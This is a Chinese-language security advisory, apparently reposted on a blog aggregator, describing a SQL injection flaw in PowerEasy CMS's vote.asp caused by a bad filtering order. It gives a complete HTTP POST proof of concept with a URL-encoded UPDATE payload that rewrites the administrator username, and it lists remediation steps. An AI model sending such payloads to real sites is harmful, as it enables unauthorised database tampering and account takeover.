动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
动易网站管理系统vote.asp页面存在SQL注入漏洞
测试系统:
动易(PowerEasy CMS SP6 071030以下版本)
安全综述:
动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。
漏洞描述:
vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入
但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制。但是其过滤的顺序不对。有导致mssql的注释符号--可以进入语句
测试方法:
POST Vote.asp HTTP/1.1
Accept: p_w_picpath/gif, p_w_picpath/x-xbitmap, p_w_picpath/jpeg, p_w_picpath/pjpeg, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/Vote.asp?ID=2&Action=Show
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1
Content-Length: 160
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: rtime=0; ltime=1191765883073; cnzz_eid=6855133-; AJSTAT_ok_times=2; ViewMode=1; PJBlog2Setting=ViewType=normal; http%3A%2F%2Fkw%2Elyedu%2Ecom%2Ecn=lao=8; style=null; chkRemember=false; ASPSESSIONID×××CABTA=JJODPHAACKPHCFNFCKEINALN; VotedID=1
VoteOption=1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D&VoteType=Multi&Action=Vote&ID=2
其中 1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D解码后为
1=1+update PE_Admin set adminname=0x61-;-
他们先过滤了--再过滤; 导致以-;-的形式可以很轻松的把注释符带入语句,执行语句后,成功把管理员的用户名设置为a
解决方案:
更新动易组件(需要管理员的权限才能更新)。
不需要投票功能的用户,删除此文件。
有需要,但是又没有权限更新动易组件(需要管理员的权限才能更新)的用户。请在vote.asp文件自行过滤各个参数。
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞相关推荐
- 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞 漏洞描述 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改 ...
- thinkphp日志泄漏漏洞_ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞,漏洞存在于ThinkPHP/Lib/Core/Model.class.php 文件 根据官方文档对"防止SQL注入" ...
- 测试php框架漏洞,ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法...
作者: seay 下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑.建议类似的厂商不要再 ...
- 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析
0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...
- 迅雷某页面存在sql注入漏洞
漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...
- SQL注入漏洞的检测与防范技术
提 要 本文从SQL注入的基本概念和注入原理入手,分析总结了SQL注入漏洞的检测及其防范技术措施. 关键词 SQL注入漏洞 检测 防范技术 引 言 近几年来随着计算机网络和WEB技术的飞速 ...
最新文章
- etcd 笔记(01)— etcd 简介、特点、应用场景、常用术语、分布式 CAP 理论、分布式原理
- 源文件封装为IP的步骤
- 这个冬天,将是共享单车最艰难的时刻
- 以太网,IP,TCP,UDP数据包分析【转】
- php curl和file get,PHP cURL与file_get_contents
- [渝粤教育] 新乡医学院 医学免疫学 参考 资料
- php文件上传并保存路径到数据库,thinkphp表单上传文件并将文件路径保存到数据库中?...
- PyTorch框架学习十九——模型加载与保存
- android物理健代码,Android 物理按键整理及实例代码
- PuTTY 远程连接矩池云GPU主机
- 再见,Navicat!这个 IDEA 的兄弟,真香!
- DotCMS安装步骤
- arm linux 内存压力测试,嵌入式中如何给内存做压力测试?
- 一杯免费咖啡引发的ERP上云思考
- ios QQ下拉列表 UITableViewHeaderFooterView
- EDA实验(3)计数器设计
- Activiti reassign task to another user
- 【C++从青铜到王者】第十八篇:C++之多态
- ffmpeg 视频提取音频 php-ffmpeg
- 注解的作用 常用注解
热门文章
- 现代数据中心标准COTS服务器的演进
- [Practical.Vim(2012.9)].Drew.Neil.Tip19学习摘要
- 网络游戏服务器架构流程
- 东方博宜OJ 1052 - 【入门】行李托运费
- 苹果平板做ppt方便吗_有没有苹果手机和安卓平板之间方便复制粘贴的工具啊?...
- 计算机微课论文参考文献,微课教学学论文参考文献 微课教学参考文献怎么写...
- ubuntu qt平台搭建openssl开发环境
- 关于项目管理那档子事儿
- codevs 1227 方格取数2
- 盘点国产青春电影十宗罪